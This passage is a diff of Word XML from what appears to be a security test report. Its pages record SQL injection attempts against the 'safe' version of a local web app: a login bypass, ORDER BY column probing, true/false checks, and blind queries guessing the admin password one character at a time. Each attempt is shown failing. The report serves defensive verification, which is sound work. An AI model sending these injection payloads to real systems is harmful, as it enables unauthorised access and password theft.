+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t>Capture timestamp UTC: 2026-10-11T16:08:16.500Z. The screenshot footer displays PKT.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl w:val="0"/>
+        <w:autoSpaceDE w:val="0"/>
+        <w:autoSpaceDN w:val="0"/>
+        <w:adjustRightInd w:val="0"/>
+        <w:spacing w:after="180" w:line="280" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t>Target URL: http://localhost:8000/safe/profile</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -6337,7 +6544,7 @@
           <w:sz w:val="22"/>
           <w:szCs w:val="22"/>
         </w:rPr>
-        <w:pict w14:anchorId="1F28F662">
+        <w:pict w14:anchorId="3CF9F78E">
           <v:shape id="_x0000_i1053" type="#_x0000_t75" style="width:495pt;height:344.25pt">
             <v:imagedata r:id="rId32" o:title=""/>
           </v:shape>
@@ -6366,7 +6573,7 @@
           <w:sz w:val="18"/>
           <w:szCs w:val="18"/>
         </w:rPr>
-        <w:t>Page 33 of 41</w:t>
+        <w:t>Page 34 of 46</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -6402,104 +6609,103 @@
           <w:sz w:val="32"/>
           <w:szCs w:val="32"/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
-        <w:t>Safe Sqli Intermediate Infer A</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:widowControl w:val="0"/>
-        <w:autoSpaceDE w:val="0"/>
-        <w:autoSpaceDN w:val="0"/>
-        <w:adjustRightInd w:val="0"/>
-        <w:spacing w:after="180" w:line="280" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="22"/>
-          <w:szCs w:val="22"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="22"/>
-          <w:szCs w:val="22"/>
-        </w:rPr>
-        <w:t xml:space="preserve">Input or attack setup: ENR-2026-001' AND substr((SELECT password FROM users WHERE username='admin'),1,1)='A' -- </w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:widowControl w:val="0"/>
-        <w:autoSpaceDE w:val="0"/>
-        <w:autoSpaceDN w:val="0"/>
-        <w:adjustRightInd w:val="0"/>
-        <w:spacing w:after="180" w:line="280" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="22"/>
-          <w:szCs w:val="22"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="22"/>
-          <w:szCs w:val="22"/>
-        </w:rPr>
-        <w:t>Observed result: No matching enrollment</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:widowControl w:val="0"/>
-        <w:autoSpaceDE w:val="0"/>
-        <w:autoSpaceDN w:val="0"/>
-        <w:adjustRightInd w:val="0"/>
-        <w:spacing w:after="180" w:line="280" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="22"/>
-          <w:szCs w:val="22"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="22"/>
-          <w:szCs w:val="22"/>
-        </w:rPr>
-        <w:t>Capture timestamp UTC: 2026-10-09T13:06:49.224Z. The screenshot footer displays PKT.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:widowControl w:val="0"/>
-        <w:autoSpaceDE w:val="0"/>
-        <w:autoSpaceDN w:val="0"/>
-        <w:adjustRightInd w:val="0"/>
-        <w:spacing w:after="180" w:line="280" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="22"/>
-          <w:szCs w:val="22"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="22"/>
-          <w:szCs w:val="22"/>
-        </w:rPr>
-        <w:t>Target endpoint: http://localhost:8000/safe/enrollment. Exact encoded URL is in verification.json.</w:t>
+        <w:t>Safe Version SQL Injection Easy</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl w:val="0"/>
+        <w:autoSpaceDE w:val="0"/>
+        <w:autoSpaceDN w:val="0"/>
+        <w:adjustRightInd w:val="0"/>
+        <w:spacing w:after="180" w:line="280" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t>Input or attack setup: username=admin' -- ; password=wrong</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl w:val="0"/>
+        <w:autoSpaceDE w:val="0"/>
+        <w:autoSpaceDN w:val="0"/>
+        <w:adjustRightInd w:val="0"/>
+        <w:spacing w:after="180" w:line="280" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t>Observed result: Invalid credentials; attack rejected.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl w:val="0"/>
+        <w:autoSpaceDE w:val="0"/>
+        <w:autoSpaceDN w:val="0"/>
+        <w:adjustRightInd w:val="0"/>
+        <w:spacing w:after="180" w:line="280" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t>Capture timestamp UTC: 2026-10-11T16:08:17.227Z. The screenshot footer displays PKT.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl w:val="0"/>
+        <w:autoSpaceDE w:val="0"/>
+        <w:autoSpaceDN w:val="0"/>
+        <w:adjustRightInd w:val="0"/>
+        <w:spacing w:after="180" w:line="280" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t>Target URL: http://localhost:8000/safe/login</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -6524,195 +6730,8 @@
           <w:sz w:val="22"/>
           <w:szCs w:val="22"/>
         </w:rPr>
-        <w:pict w14:anchorId="0180CA5F">
+        <w:pict w14:anchorId="5C9AD229">
           <v:shape id="_x0000_i1054" type="#_x0000_t75" style="width:495pt;height:344.25pt">
-            <v:imagedata r:id="rId32" o:title=""/>
-          </v:shape>
-        </w:pict>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:widowControl w:val="0"/>
-        <w:autoSpaceDE w:val="0"/>
-        <w:autoSpaceDN w:val="0"/>
-        <w:adjustRightInd w:val="0"/>
-        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
-        <w:jc w:val="right"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="22"/>
-          <w:szCs w:val="22"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-        </w:rPr>
-        <w:t>Page 34 of 41</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:keepNext/>
-        <w:widowControl w:val="0"/>
-        <w:autoSpaceDE w:val="0"/>
-        <w:autoSpaceDN w:val="0"/>
-        <w:adjustRightInd w:val="0"/>
-        <w:spacing w:after="240" w:line="240" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="22"/>
-          <w:szCs w:val="22"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="22"/>
-          <w:szCs w:val="22"/>
-        </w:rPr>
-        <w:br w:type="page"/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-          <w:b/>
-          <w:bCs/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="32"/>
-          <w:szCs w:val="32"/>
-        </w:rPr>
-        <w:lastRenderedPageBreak/>
-        <w:t>Safe Sqli Intermediate Infer Z</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:widowControl w:val="0"/>
-        <w:autoSpaceDE w:val="0"/>
-        <w:autoSpaceDN w:val="0"/>
-        <w:adjustRightInd w:val="0"/>
-        <w:spacing w:after="180" w:line="280" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="22"/>
-          <w:szCs w:val="22"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="22"/>
-          <w:szCs w:val="22"/>
-        </w:rPr>
-        <w:t xml:space="preserve">Input or attack setup: ENR-2026-001' AND substr((SELECT password FROM users WHERE username='admin'),1,1)='Z' -- </w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:widowControl w:val="0"/>
-        <w:autoSpaceDE w:val="0"/>
-        <w:autoSpaceDN w:val="0"/>
-        <w:adjustRightInd w:val="0"/>
-        <w:spacing w:after="180" w:line="280" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="22"/>
-          <w:szCs w:val="22"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="22"/>
-          <w:szCs w:val="22"/>
-        </w:rPr>
-        <w:t>Observed result: No matching enrollment</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:widowControl w:val="0"/>
-        <w:autoSpaceDE w:val="0"/>
-        <w:autoSpaceDN w:val="0"/>
-        <w:adjustRightInd w:val="0"/>
-        <w:spacing w:after="180" w:line="280" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="22"/>
-          <w:szCs w:val="22"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="22"/>
-          <w:szCs w:val="22"/>
-        </w:rPr>
-        <w:t>Capture timestamp UTC: 2026-10-09T13:06:49.727Z. The screenshot footer displays PKT.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:widowControl w:val="0"/>
-        <w:autoSpaceDE w:val="0"/>
-        <w:autoSpaceDN w:val="0"/>
-        <w:adjustRightInd w:val="0"/>
-        <w:spacing w:after="180" w:line="280" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="22"/>
-          <w:szCs w:val="22"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="22"/>
-          <w:szCs w:val="22"/>
-        </w:rPr>
-        <w:t>Target endpoint: http://localhost:8000/safe/enrollment. Exact encoded URL is in verification.json.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:widowControl w:val="0"/>
-        <w:autoSpaceDE w:val="0"/>
-        <w:autoSpaceDN w:val="0"/>
-        <w:adjustRightInd w:val="0"/>
-        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
-        <w:jc w:val="center"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="22"/>
-          <w:szCs w:val="22"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="22"/>
-          <w:szCs w:val="22"/>
-        </w:rPr>
-        <w:pict w14:anchorId="44E05DE7">
-          <v:shape id="_x0000_i1055" type="#_x0000_t75" style="width:495pt;height:344.25pt">
             <v:imagedata r:id="rId33" o:title=""/>
           </v:shape>
         </w:pict>
@@ -6740,7 +6759,7 @@
           <w:sz w:val="18"/>
           <w:szCs w:val="18"/>
         </w:rPr>
-        <w:t>Page 35 of 41</w:t>
+        <w:t>Page 35 of 46</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -6776,104 +6795,112 @@
           <w:sz w:val="32"/>
           <w:szCs w:val="32"/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
-        <w:t>Safe Sqli Advanced Columns Three</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:widowControl w:val="0"/>
-        <w:autoSpaceDE w:val="0"/>
-        <w:autoSpaceDN w:val="0"/>
-        <w:adjustRightInd w:val="0"/>
-        <w:spacing w:after="180" w:line="280" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="22"/>
-          <w:szCs w:val="22"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="22"/>
-          <w:szCs w:val="22"/>
-        </w:rPr>
-        <w:t xml:space="preserve">Input or attack setup: ' ORDER BY 3 -- </w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:widowControl w:val="0"/>
-        <w:autoSpaceDE w:val="0"/>
-        <w:autoSpaceDN w:val="0"/>
-        <w:adjustRightInd w:val="0"/>
-        <w:spacing w:after="180" w:line="280" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="22"/>
-          <w:szCs w:val="22"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="22"/>
-          <w:szCs w:val="22"/>
-        </w:rPr>
-        <w:t>Observed result: Literal search input; no injected rows.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:widowControl w:val="0"/>
-        <w:autoSpaceDE w:val="0"/>
-        <w:autoSpaceDN w:val="0"/>
-        <w:adjustRightInd w:val="0"/>
-        <w:spacing w:after="180" w:line="280" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="22"/>
-          <w:szCs w:val="22"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="22"/>
-          <w:szCs w:val="22"/>
-        </w:rPr>
-        <w:t>Capture timestamp UTC: 2026-10-09T13:06:50.242Z. The screenshot footer displays PKT.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:widowControl w:val="0"/>
-        <w:autoSpaceDE w:val="0"/>
-        <w:autoSpaceDN w:val="0"/>
-        <w:adjustRightInd w:val="0"/>
-        <w:spacing w:after="180" w:line="280" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="22"/>
-          <w:szCs w:val="22"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="22"/>
-          <w:szCs w:val="22"/>
-        </w:rPr>
-        <w:t>Target URL: http://localhost:8000/safe/courses?q=%27+ORDER+BY+3+--+</w:t>
+        <w:t>Safe Version Sql Injection Intermediate True</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl w:val="0"/>
+        <w:autoSpaceDE w:val="0"/>
+        <w:autoSpaceDN w:val="0"/>
+        <w:adjustRightInd w:val="0"/>
+        <w:spacing w:after="180" w:line="280" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Input or attack setup: ENR-2026-001' AND 1=1 -- </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl w:val="0"/>
+        <w:autoSpaceDE w:val="0"/>
+        <w:autoSpaceDN w:val="0"/>
+        <w:adjustRightInd w:val="0"/>
+        <w:spacing w:after="180" w:line="280" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t>Observed result: No matching enrollment</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl w:val="0"/>
+        <w:autoSpaceDE w:val="0"/>
+        <w:autoSpaceDN w:val="0"/>
+        <w:adjustRightInd w:val="0"/>
+        <w:spacing w:after="180" w:line="280" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t>Capture timestamp UTC: 2026-10-11T16:08:17.801Z. The screenshot footer displays PKT.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl w:val="0"/>
+        <w:autoSpaceDE w:val="0"/>
+        <w:autoSpaceDN w:val="0"/>
+        <w:adjustRightInd w:val="0"/>
+        <w:spacing w:after="180" w:line="280" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t>Target URL: http://localh</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t>ost:8000/safe/enrollment?reference=ENR-2026-001%27+AND+1%3D1+--+</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -6898,7 +6925,193 @@
           <w:sz w:val="22"/>
           <w:szCs w:val="22"/>
         </w:rPr>
-        <w:pict w14:anchorId="6E7F3405">
+        <w:pict w14:anchorId="3A7D44FD">
+          <v:shape id="_x0000_i1055" type="#_x0000_t75" style="width:495pt;height:344.25pt">
+            <v:imagedata r:id="rId34" o:title=""/>
+          </v:shape>
+        </w:pict>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl w:val="0"/>
+        <w:autoSpaceDE w:val="0"/>
+        <w:autoSpaceDN w:val="0"/>
+        <w:adjustRightInd w:val="0"/>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:jc w:val="right"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t>Page 36 of 46</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:keepNext/>
+        <w:widowControl w:val="0"/>
+        <w:autoSpaceDE w:val="0"/>
+        <w:autoSpaceDN w:val="0"/>
+        <w:adjustRightInd w:val="0"/>
+        <w:spacing w:after="240" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:br w:type="page"/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:b/>
+          <w:bCs/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t>Safe Version Sql Injection Intermediate False</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl w:val="0"/>
+        <w:autoSpaceDE w:val="0"/>
+        <w:autoSpaceDN w:val="0"/>
+        <w:adjustRightInd w:val="0"/>
+        <w:spacing w:after="180" w:line="280" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Input or attack setup: ENR-2026-001' AND 1=2 -- </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl w:val="0"/>
+        <w:autoSpaceDE w:val="0"/>
+        <w:autoSpaceDN w:val="0"/>
+        <w:adjustRightInd w:val="0"/>
+        <w:spacing w:after="180" w:line="280" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t>Observed result: No matching enrollment</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl w:val="0"/>
+        <w:autoSpaceDE w:val="0"/>
+        <w:autoSpaceDN w:val="0"/>
+        <w:adjustRightInd w:val="0"/>
+        <w:spacing w:after="180" w:line="280" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t>Capture timestamp UTC: 2026-10-11T16:08:18.405Z. The screenshot footer displays PKT.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl w:val="0"/>
+        <w:autoSpaceDE w:val="0"/>
+        <w:autoSpaceDN w:val="0"/>
+        <w:adjustRightInd w:val="0"/>
+        <w:spacing w:after="180" w:line="280" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:kern w:val="0"/>
